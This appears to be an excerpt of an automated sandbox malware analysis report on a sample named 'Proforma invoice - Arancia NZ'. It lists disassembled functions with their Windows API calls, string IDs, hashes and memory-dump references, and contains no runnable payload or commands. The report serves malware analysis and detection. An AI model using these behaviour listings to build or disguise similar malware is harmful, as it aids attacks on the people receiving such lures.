                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4176008265-0
                                                                                                                    • Opcode ID: 6f2d2f2e3ca43d4f942c201594341914b206ffc5c74a8258f8cdff4b0ccc3d92
                                                                                                                    • Instruction ID: c6dd401a2c7bc5dc61a1e4a49c21e8cab8e300d8279005eba4dde769f0b84d88
                                                                                                                    • Opcode Fuzzy Hash: 6f2d2f2e3ca43d4f942c201594341914b206ffc5c74a8258f8cdff4b0ccc3d92
                                                                                                                    • Instruction Fuzzy Hash: 0461AD7092034AEFDB21CF64DD88DEEBBBCEB45384F544459E842A3251DB31AD29DB21
                                                                                                                    Function 002D6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002D6FA5
                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002D6FA8
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D6FCC
                                                                                                                    • _memset.LIBCMT ref: 002D6FDD
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002D6FEF
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002D7067
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 830647256-0
                                                                                                                    • Opcode ID: cfaf2235a6806187c66e45336e35c63a4399e767471a531b7fcf1dfc439026b9
                                                                                                                    • Instruction ID: 1f2463ad3099a1d727fdaaea1e04157505f21785684a909d48f7eae7ed8d9b32
                                                                                                                    • Opcode Fuzzy Hash: cfaf2235a6806187c66e45336e35c63a4399e767471a531b7fcf1dfc439026b9
                                                                                                                    • Instruction Fuzzy Hash: B9617975A10209EFDB11DFA8CC81EEE77B8AB08710F10419AFA15AB3A1D775AD51CB90
                                                                                                                    Function 002A6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002A6BBF
                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 002A6C18
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002A6C2A
                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 002A6C4A
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 002A6C9D
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 002A6CB1
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002A6CC6
                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 002A6CD3
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A6CDC
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002A6CEE
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A6CF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2706829360-0
                                                                                                                    • Opcode ID: 81de9cb07179bbb78a866e052df802ec3bb8236a472b97d226d4ac05620d272a
                                                                                                                    • Instruction ID: 034b52d52ef777b15aac4fcb66325e40911456296e73527ea1af2c547c75cf76
                                                                                                                    • Opcode Fuzzy Hash: 81de9cb07179bbb78a866e052df802ec3bb8236a472b97d226d4ac05620d272a
                                                                                                                    • Instruction Fuzzy Hash: D1415F31E102199FCB00DF64D94C9AEBBB9EF09354F04806AE956A7261CB30AD55CFA4
                                                                                                                    Function 002C5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 002C5793
                                                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 002C57D8
                                                                                                                    • gethostbyname.WSOCK32(?), ref: 002C57E4
                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 002C57F2
                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5862
                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5878
                                                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 002C58ED
                                                                                                                    • WSACleanup.WSOCK32 ref: 002C58F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                    • String ID: Ping
                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                    • Opcode ID: 780f05ed35bc98fe1f419848b0e7b8588a845a2b229e786648faea6214c37e36
                                                                                                                    • Instruction ID: b9b970345fa6d102fced542fbec752845307903c827d7ee48b94925c78bf0302
                                                                                                                    • Opcode Fuzzy Hash: 780f05ed35bc98fe1f419848b0e7b8588a845a2b229e786648faea6214c37e36
                                                                                                                    • Instruction Fuzzy Hash: 08517C31620A119FDB10DF24DC49F2AB7E4AF48720F04862AF956DB2A1DB70EC94CF45
                                                                                                                    Function 002BB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 002BB4D0
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002BB546
                                                                                                                    • GetLastError.KERNEL32 ref: 002BB550
                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 002BB5BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                    • Opcode ID: 31caae93737c0cfb3d6ac9607fe998af5f085a7f91a2e9968cf83b389d161abd
                                                                                                                    • Instruction ID: bae1e64afe9e9ae3df93fc367e6fb664f90d4cc6a20e57419541fe905cf83b00
                                                                                                                    • Opcode Fuzzy Hash: 31caae93737c0cfb3d6ac9607fe998af5f085a7f91a2e9968cf83b389d161abd
                                                                                                                    • Instruction Fuzzy Hash: 4431D435A20206DFCB22EF68CC45EFDB7B4FF08341F544026E90597291DBB09A56CB52
                                                                                                                    Function 002A8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002A9014
                                                                                                                    • GetDlgCtrlID.USER32 ref: 002A901F
                                                                                                                    • GetParent.USER32 ref: 002A903B
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 002A903E
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 002A9047
                                                                                                                    • GetParent.USER32(?), ref: 002A9063
                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 002A9066
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                    • Opcode ID: a47f1d65c439b00f14ba29489eb95ed1faf072071e33382a239b3c9714b410d4
                                                                                                                    • Instruction ID: 1c23d67eb944b45c98454b5cf69a72ce300e35c77a76dd775fad815c62e27400
                                                                                                                    • Opcode Fuzzy Hash: a47f1d65c439b00f14ba29489eb95ed1faf072071e33382a239b3c9714b410d4
                                                                                                                    • Instruction Fuzzy Hash: 4221E570E11104BBDF01ABA0CC99EFEB778EF49310F004116B922972E1DF759869DE64
                                                                                                                    Function 002A907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002A90FD
                                                                                                                    • GetDlgCtrlID.USER32 ref: 002A9108
                                                                                                                    • GetParent.USER32 ref: 002A9124
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 002A9127
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 002A9130
                                                                                                                    • GetParent.USER32(?), ref: 002A914C
                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 002A914F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                    • Opcode ID: 22422580f75da77b41d6f089e07a185f19cc72122e7c1d450cccbc3949a2a2d1
                                                                                                                    • Instruction ID: cf7280736f004eb3e74c9a6f2703d0360b7fbf8a44c8abad6cf90e34b2dc32b4
                                                                                                                    • Opcode Fuzzy Hash: 22422580f75da77b41d6f089e07a185f19cc72122e7c1d450cccbc3949a2a2d1
                                                                                                                    • Instruction Fuzzy Hash: 4321D674E11105BBDF01ABA1DC89EFEBB78EF49300F004016F921972E1DB759869DE64
                                                                                                                    Function 002A9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32 ref: 002A916F
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 002A9184
                                                                                                                    • _wcscmp.LIBCMT ref: 002A9196
                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002A9211
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                    • Opcode ID: b775529d3e114575e7ccbb0f49b9501f0e4f51985cfd8e0b60f37abfd5cc2bf8
                                                                                                                    • Instruction ID: 4af56f06bf6a9b6575253ee10223efe1b9b1779a20bd3a55517252fa567fe817
                                                                                                                    • Opcode Fuzzy Hash: b775529d3e114575e7ccbb0f49b9501f0e4f51985cfd8e0b60f37abfd5cc2bf8
                                                                                                                    • Instruction Fuzzy Hash: FD113636668307BBFA112A25EC1AEE7379C9B06320F200026FD04E04D5FFA17CB55D94
                                                                                                                    Function 002B7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 002B7A6C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafeVartype
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1725837607-0
                                                                                                                    • Opcode ID: f28d1a7ddba209728b35b66845e0318361adb297f915197b9ada63988a5eb714
                                                                                                                    • Instruction ID: 4dcefd608c71b7035e891d65d1e912b00dcc0b2ee5181d3b5267840788664752
                                                                                                                    • Opcode Fuzzy Hash: f28d1a7ddba209728b35b66845e0318361adb297f915197b9ada63988a5eb714
                                                                                                                    • Instruction Fuzzy Hash: AEB19F7192421A9FDB10DFA4C884BFEBBB4EF89361F20442AEA41E7241D774E951CF90
                                                                                                                    Function 002B11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002B11F0
                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B1204
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 002B120B
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0268,?,00000001), ref: 002B121A
                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 002B122C
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0268,?,00000001), ref: 002B1245
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0268,?,00000001), ref: 002B1257
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B129C
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B12B1
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B12BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2156557900-0
                                                                                                                    • Opcode ID: 493b1c6b295aa1dc9edfccb2f5f3843c4e5ee577e4c78e807c7338cdfe7ebff5
                                                                                                                    • Instruction ID: e0aae012f56792a6a1eef0f2469afa7c260b54cd5ad3ed41b730bdf43a3ddbd2
                                                                                                                    • Opcode Fuzzy Hash: 493b1c6b295aa1dc9edfccb2f5f3843c4e5ee577e4c78e807c7338cdfe7ebff5
                                                                                                                    • Instruction Fuzzy Hash: F2310475A11215FFDB119FA4FD59FEA37AEEB58391F508126FC01C61A0D3B09E608B60
                                                                                                                    Function 0025FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0025FAA6
                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 0025FB45
                                                                                                                    • UnregisterHotKey.USER32(?), ref: 0025FC9C
                                                                                                                    • DestroyWindow.USER32(?), ref: 002945D6
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0029463B
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00294668
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                    • String ID: close all
                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                    • Opcode ID: 6bf51f2f4fcfb58216ffd4bb5d1dd8b3d1e718b4f00ac42cee6b50f9dfa19171
                                                                                                                    • Instruction ID: c9527202852aa9e5f40b24077d6771cea9b5dcd693d713ba8613c8bf1ddb37c5
                                                                                                                    • Opcode Fuzzy Hash: 6bf51f2f4fcfb58216ffd4bb5d1dd8b3d1e718b4f00ac42cee6b50f9dfa19171
                                                                                                                    • Instruction Fuzzy Hash: 8DA16C70721212CFCB59EF14C695E69F368AF05701F5442ADEC0AAB261DB30AD7ACF94
                                                                                                                    Function 002C9113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                                                    • String ID: ,,.$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                    • API String ID: 2862541840-1389923024
                                                                                                                    • Opcode ID: d301857a0e7aff073f0388d3ba582f9d0db06e4854f2598dd26fd367be76793f
                                                                                                                    • Instruction ID: 1822d00da2da327aea7034cbd5aabbb83db44800693f26be701b49371fb0c6ae
                                                                                                                    • Opcode Fuzzy Hash: d301857a0e7aff073f0388d3ba582f9d0db06e4854f2598dd26fd367be76793f
                                                                                                                    • Instruction Fuzzy Hash: 3F918F71A20216EBDF24DFA5C848FAEB7B8EF45710F10825DF915AB280D7709995CFA0
                                                                                                                    Function 002AA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnumChildWindows.USER32(?,002AA439), ref: 002AA377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 3555792229-1603158881
                                                                                                                    • Opcode ID: b099071cca02a6dec9cf3b80c4350d9c3d1cba17a798a393e2d8a1bd72363889
                                                                                                                    • Instruction ID: 2df1ab82a9bca1efda9e6450aee286ed4b0e8cacc0480122ab1d288493ae7301
                                                                                                                    • Opcode Fuzzy Hash: b099071cca02a6dec9cf3b80c4350d9c3d1cba17a798a393e2d8a1bd72363889
                                                                                                                    • Instruction Fuzzy Hash: 3291A630920606EBCB09DFA0C492BEEFB74BF05300F548119D959A7191DF7169B9DFA1
                                                                                                                    Function 00252E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00252EAE
                                                                                                                      • Part of subcall function 00251DB3: GetClientRect.USER32(?,?), ref: 00251DDC
                                                                                                                      • Part of subcall function 00251DB3: GetWindowRect.USER32(?,?), ref: 00251E1D
                                                                                                                      • Part of subcall function 00251DB3: ScreenToClient.USER32(?,?), ref: 00251E45
                                                                                                                    • GetDC.USER32 ref: 0028CD32
                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0028CD45
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0028CD53
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0028CD68
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0028CD70
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0028CDFB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
